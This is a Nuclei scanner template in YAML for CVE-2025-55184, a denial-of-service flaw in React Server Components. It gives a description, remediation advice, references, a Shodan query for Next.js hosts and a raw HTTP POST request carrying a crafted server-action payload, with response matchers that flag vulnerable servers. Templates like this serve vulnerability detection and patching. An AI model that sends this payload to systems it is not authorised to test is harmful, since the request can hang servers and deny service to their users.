id: CVE-2025-55184

info:
  name: React Server Components - DOS
  author: DhiyaneshDk,CyberTechAjju
  severity: high
  description: |
    React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
  impact: |
    Unauthenticated attackers can cause the server to hang indefinitely, resulting in denial of service and preventing legitimate requests.
  remediation: |
    Update to the latest version beyond 19.2.1.
  reference:
    - https://vercel.com/kb/bulletin/security-bulletin-cve-2025-55184-and-cve-2025-55183#patched-versions
    - https://www.facebook.com/security/advisories/cve-2025-55184
    - https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Next.js"
  tags: cve,cve2025,react,headless,nextjs,react,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/x-component
        Content-Type: application/x-www-form-urlencoded
        Next-Action: x

        0=["$F1"]&1={"id":"x","bound":null}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'text/plain')"
          - "status_code == 404"
          - 'contains(body, "Server action not found")'
        condition: and
# digest: 490a0046304402205898f2f1bc1b4a7bb3a8ace17c6e57457539f1a4088a3f3222e57394394dc47102200e92451037cba0f1d6fe84a963e6323e60ceafc2e5a4972f05e1ff9c1466918e:922c64590222798bb761d5b6d8e72950